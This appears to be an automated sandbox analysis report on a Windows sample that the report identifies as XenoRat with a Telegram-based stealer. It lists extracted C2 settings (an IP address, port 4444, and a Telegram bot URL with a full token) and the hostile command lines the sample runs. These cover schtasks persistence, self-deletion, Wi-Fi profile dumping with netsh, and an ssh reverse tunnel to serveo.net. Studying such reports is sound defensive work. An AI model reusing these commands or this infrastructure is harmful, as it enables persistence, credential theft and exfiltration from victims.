Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2024 10:24
Static task
static1
Behavioral task
behavioral1
Sample
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Resource
win10v2004-20240802-en
General
-
Target
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
-
Size
9.1MB
-
MD5
1bafb4856a31ae27271fbd2ee1574a4f
-
SHA1
b8b3649d959524df2c4e8a94434fc0de90f95005
-
SHA256
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
-
SHA512
e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
-
SSDEEP
3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D
Malware Config
Extracted
xenorat
193.149.187.135
Xeno_rat_nd8912d
-
delay
5000
-
install_path
appdata
-
port
4444
-
startup_name
mswindow
Extracted
gurcu
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389
Signatures
-
Detect XenoRat Payload 3 IoCs
resource yara_rule behavioral2/files/0x00080000000234fe-22.dat family_xenorat behavioral2/memory/5012-29-0x00000000003C0000-0x00000000003D4000-memory.dmp family_xenorat behavioral2/memory/5064-46-0x0000000005780000-0x000000000578C000-memory.dmp family_xenorat -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation manager.exe -
Executes dropped EXE 5 IoCs
pid Process 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 4924 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 5012 manager.exe 5064 manager.exe 3660 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language manager.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language manager.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2716 cmd.exe 1404 netsh.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1300 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4456 schtasks.exe 3764 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe 5064 manager.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 748 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Token: SeDebugPrivilege 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Token: SeDebugPrivilege 4924 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe Token: SeDebugPrivilege 5064 manager.exe Token: SeDebugPrivilege 3660 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 5064 manager.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 748 wrote to memory of 2016 748 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 82 PID 748 wrote to memory of 2016 748 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 82 PID 2016 wrote to memory of 1328 2016 cmd.exe 84 PID 2016 wrote to memory of 1328 2016 cmd.exe 84 PID 2016 wrote to memory of 1300 2016 cmd.exe 85 PID 2016 wrote to memory of 1300 2016 cmd.exe 85 PID 2016 wrote to memory of 4456 2016 cmd.exe 86 PID 2016 wrote to memory of 4456 2016 cmd.exe 86 PID 2016 wrote to memory of 1556 2016 cmd.exe 87 PID 2016 wrote to memory of 1556 2016 cmd.exe 87 PID 1556 wrote to memory of 2716 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 88 PID 1556 wrote to memory of 2716 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 88 PID 2716 wrote to memory of 4356 2716 cmd.exe 90 PID 2716 wrote to memory of 4356 2716 cmd.exe 90 PID 2716 wrote to memory of 1404 2716 cmd.exe 91 PID 2716 wrote to memory of 1404 2716 cmd.exe 91 PID 2716 wrote to memory of 4068 2716 cmd.exe 92 PID 2716 wrote to memory of 4068 2716 cmd.exe 92 PID 1556 wrote to memory of 1848 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 93 PID 1556 wrote to memory of 1848 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 93 PID 1848 wrote to memory of 3104 1848 cmd.exe 95 PID 1848 wrote to memory of 3104 1848 cmd.exe 95 PID 1848 wrote to memory of 2884 1848 cmd.exe 96 PID 1848 wrote to memory of 2884 1848 cmd.exe 96 PID 1848 wrote to memory of 4776 1848 cmd.exe 97 PID 1848 wrote to memory of 4776 1848 cmd.exe 97 PID 1556 wrote to memory of 2580 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 99 PID 1556 wrote to memory of 2580 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 99 PID 1556 wrote to memory of 5012 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 110 PID 1556 wrote to memory of 5012 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 110 PID 1556 wrote to memory of 5012 1556 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe 110 PID 5012 wrote to memory of 5064 5012 manager.exe 111 PID 5012 wrote to memory of 5064 5012 manager.exe 111 PID 5012 wrote to memory of 5064 5012 manager.exe 111 PID 5064 wrote to memory of 3764 5064 manager.exe 112 PID 5064 wrote to memory of 3764 5064 manager.exe 112 PID 5064 wrote to memory of 3764 5064 manager.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1328
-
-
C:\Windows\system32\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
PID:1300
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4456
-
-
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1556 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4356
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1404
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:4068
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:3104
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2884
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:4776
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2716 serveo.net4⤵PID:2580
-
-
C:\Users\Admin\AppData\Roaming\manager.exe"C:\Users\Admin\AppData\Roaming\manager.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Users\Admin\AppData\Roaming\XenoManager\manager.exe"C:\Users\Admin\AppData\Roaming\XenoManager\manager.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6FFB.tmp" /F6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3764
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exeC:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exeC:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3660
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe.log
Filesize847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
C:\Users\Admin\AppData\Local\Starlabs\91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff.exe
Filesize9.1MB
MD51bafb4856a31ae27271fbd2ee1574a4f
SHA1b8b3649d959524df2c4e8a94434fc0de90f95005
SHA25691cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
SHA512e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
-
Filesize
1KB
MD5ff43295eab0b6d30700cf545b83b6a4f
SHA184dc1111c2387fe2a378ac40d5eb80755de8a833
SHA256ab95865908354ee888dd2ef3dd7b39edd6174fdbd1cb049fe7b3050830640908
SHA512cefb28d7e12adf06f9565df8a9c20b39f6ee9e180c168ab449d376aaa8828faa4a9276b8f1c06b6a8761a076a18dd665eb0cc28837e8c5fa617123f09f935302
-
Filesize
4B
MD5cdd96eedd7f695f4d61802f8105ba2b0
SHA135e7cf0540f95620e0021660828f96c7ea51a5f9
SHA256cc9cf5d8f89bae4aff9b2a1f98bc8c5a9b380be95caf7136286adafc8bd75f5f
SHA512c9063443f9bab09b0e7d09b714392ca02253d97081d5e5e39162f46e9f3f1958abb06b68c393c85b285a3c1f831790933872093e1511fc6a0e504847df15fd9d
-
Filesize
51KB
MD5da118f70d089dabfab1b43b4cd87db65
SHA16d7def883519e1099aa18c6ac2e1357edc7ea685
SHA2567788f402faf2c2221307b0c90b7c97b2235d324abe07ec3965a6c21b33c0b70e
SHA5127a78bbe0eb437bfaba85ee2513d1ccfca65b70e2e33187197d5891ddee42be453d9cadd883b171304135ee0679220e6c88c854572e41378c7968318908eaad3e